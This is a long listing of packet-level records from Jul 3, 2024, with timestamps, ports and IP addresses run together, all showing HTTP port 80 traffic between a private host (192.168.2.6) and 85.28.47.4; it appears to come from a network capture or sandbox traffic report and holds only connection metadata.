                                                                Jul 3, 2024 08:38:16.704152107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704174042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704185009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704185009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704196930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704217911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704253912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704392910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704404116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704423904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704436064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704443932 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704447031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704463959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704490900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704684973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704696894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704708099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704716921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704740047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.704756975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715065002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715080976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715090990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715101004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715135098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715148926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715159893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715162992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715198040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715318918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715359926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715405941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715416908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715426922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715436935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715446949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715454102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715457916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715480089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715501070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.715790033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715805054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.715842009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716100931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716111898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716123104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716149092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716167927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716222048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716233015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716243029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716253042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716265917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716272116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716299057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716573000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716587067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716597080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716607094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716615915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716623068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716626883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716636896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716648102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.716661930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716671944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.716695070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717047930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717058897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717071056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717082024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717094898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717096090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717112064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717139006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717276096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717287064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717295885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717314005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717334986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717391014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717402935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717411995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717422009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717432976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717432976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717443943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717447042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717453957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717466116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717474937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.717493057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.717514992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.760209084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.765490055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.934945107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.934973955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.934988022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935061932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935075998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935091019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935127974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935127974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935213089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935224056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935235023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935247898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935249090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935260057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935277939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935303926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935494900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935506105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935512066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935523033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935760021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935770988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935782909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935786009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935795069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935806036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935815096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935817957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935830116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.935832024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.935863972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.936323881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936336994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936347961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936358929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936368942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936378956 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.936379910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936391115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936402082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936413050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936422110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.936422110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.936424017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936436892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936441898 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.936446905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936459064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.936489105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.936497927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937243938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937258005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937268972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937285900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937295914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937298059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937309980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937314034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937321901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937328100 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937359095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937812090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937824011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937834978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937845945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937845945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937858105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937864065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937870026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937880993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937890053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937891960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937902927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937906027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937913895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937922001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937926054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937937021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937947989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937949896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937958956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.937975883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.937993050 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938673973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938687086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938698053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938708067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938714027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938719988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938730001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938739061 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938740969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938751936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938761950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938764095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938772917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938785076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938786030 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938797951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938802004 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938808918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938819885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938829899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.938832045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.938858032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939487934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939500093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939521074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939527035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939532042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939543962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939543962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939554930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939563036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939565897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939577103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939588070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939589024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939604998 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939605951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939616919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939625978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939626932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939637899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939649105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939654112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939659119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.939682007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.939696074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940346956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940361977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940373898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940382004 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940385103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940397024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940401077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940407991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940418959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940428972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940431118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940438986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940448999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940450907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940462112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940464020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940473080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940493107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940498114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940509081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.940519094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.940546036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.941240072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941253901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941265106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941276073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941287041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941293001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.941298962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941309929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941320896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941322088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.941333055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941340923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.941344023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941355944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.941355944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.941380024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.941405058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.021962881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.021984100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.021997929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022022009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022039890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022051096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022062063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022088051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022094011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022099972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022113085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022118092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022145987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022439003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022452116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022461891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022473097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022475004 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022602081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022746086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022758007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022768974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022778988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022784948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022816896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022931099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022942066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022953987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022964954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022968054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.022974968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022985935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.022999048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.023252010 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.023303032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023313999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023324966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023334980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023338079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.023346901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023356915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023366928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.023366928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023385048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023397923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023408890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023416996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.023418903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.023451090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.023469925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024036884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024046898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024051905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024056911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024068117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024080038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024090052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024101019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024102926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024111032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024122000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024123907 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024132967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024137020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024143934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024156094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024166107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024168015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024190903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024205923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.024908066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024919033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024930000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024940968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024951935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.024951935 CEST4971080192.168.2.685.28.47.4
